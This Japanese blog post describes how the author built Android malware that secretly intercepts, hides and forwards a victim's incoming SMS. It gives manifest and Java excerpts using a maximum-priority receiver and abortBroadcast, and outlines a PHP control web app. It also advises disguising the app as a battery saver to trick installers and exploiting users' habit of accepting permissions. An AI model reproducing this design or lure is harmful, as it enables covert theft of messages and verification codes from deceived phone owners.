SMS転送＆隠蔽するマルウェアを作ってみたよ！

自分でマルウェアを作って動作確認してみました。
最初このブログに実際に動くプログラムをＵｐしようかと当初思ってましたが、不正指令電磁的記録の「配布」や、犯罪要件となる「作成」になる恐れがある*2為要点の解説と画面キャプチャだけ掲載する事にしました。

マルウェア作成のポイントはこれだけです。

• SMS受信のブロードキャストを受けるReceiverを用意。priorityの指定を最高値に。
• 特定条件下でSMSを隠蔽＆転送。他アプリに対してSMSを隠蔽する際はBroadcastReceiver#abortBroadcast()を呼ぶだけ。
• Receiverで受け取ったSMSを転送する処理するは別途Serviceで実装。（IntentServiceでもOK）
• 別途コントロールするWEBアプリを用意。

部分的にソースを抜粋すると以下の様な感じです。
AndroidManifest.xmlの抜粋

<receiver android:name="SmsYokodoriReceiver">
    <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>

SmsYokodoriReceiver.javaの抜粋

Bundle bundle = intent.getExtras();
Object messages[] = (Object[]) bundle.get("pdus");
// 略
Intent serviceIntent = new Intent(context.getApplicationContext(), SmsTensouService.class);
serviceIntent.putExtra("pdus", messages);
context.startService(serviceIntent);
abortBroadcast(); // ブロードキャストを破棄する。「アプリのみんなにはナイショだよ！」

上記のような記述が出来ればOKなので、作成難易度はEASYだと思います。（というかすでにそういうマルウェアって沢山出てます *3 ）
WEBアプリ側もPHPでGET/POSTパラメーター取ってsqlite3読み書きしてhtmlかjsonの出力するだけです。

SMS転送＆隠蔽するマルウェアを動かしてみるよ！

まずはマルウェアのインストールです。こちらは電話番号（＝SMS宛先）を勝手に使われる被害者側のスマホに入れます。
内容は「電池長持ち！」とかの名前にして小さく注意書きに「個人の感想であり、効果には個人差があります」と書いておけば何人かは騙されるでしょう。*4

↑マルウェアの使用する権限です。
大手アプリベンダーのお陰でどんな権限も黙認してインストールさせるのが（分からない人にとっての）常識とされてしまってるので、これくらいの権限も気にならないでしょう